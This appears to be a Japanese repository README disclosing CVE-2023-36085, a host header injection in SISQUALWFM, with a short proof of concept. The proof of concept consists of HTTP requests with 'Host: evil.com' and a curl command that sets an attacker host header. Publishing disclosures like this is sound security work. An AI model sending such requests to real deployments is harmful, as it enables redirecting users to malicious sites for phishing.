
このリポジトリには、SISQUALWFM バージョン 7.1.319.103 で発見されたホストヘッダーインジェクションの脆弱性 CVE-2023-36085 に関する情報が含まれています。この脆弱性により、攻撃者はウェブページのリンクを操作したり、ユーザーを悪意のあるサイトにリダイレクトしたりすることが可能になります。この脆弱性には CVE-2023-36085 が割り当てられており、バージョン 7.1.319.111 以上で修正されています。
このリポジトリには、SISQUALWFM バージョン 7.1.319.103 で発見されたホストヘッダーインジェクションの脆弱性に関する情報が含まれています。この脆弱性により、攻撃者は Web ページのリンクを操作したり、ユーザーを悪意のあるサイトにリダイレクトしたりすることができます。この脆弱性には CVE-2023-36085 が割り当てられており、バージョン 7.1.319.111 以降で修正されています。
ホストヘッダーインジェクションの脆弱性を示す概念実証シナリオを提供します。具体的には /sisqualIdentityServer/core エンドポイントを対象としています。この脆弱性により、攻撃者はホストヘッダーを改ざんすることで Web ページのリンクを操作したり、ユーザーを別のサイトにリダイレクトしたりすることができます。
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

この脆弱性を悪用するには、攻撃者は以下の curl コマンドを使用してホストヘッダーを改変できます:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
このリポジトリは情報提供のみを目的としており、悪意のある活動に使用すべきではありません。この脆弱性はベンダーに責任を持って開示され、問題は解決済みです。脆弱性を特定および報告する際には、倫理的なハッキングのガイドラインに従い、責任ある開示の慣行を尊重することが重要です。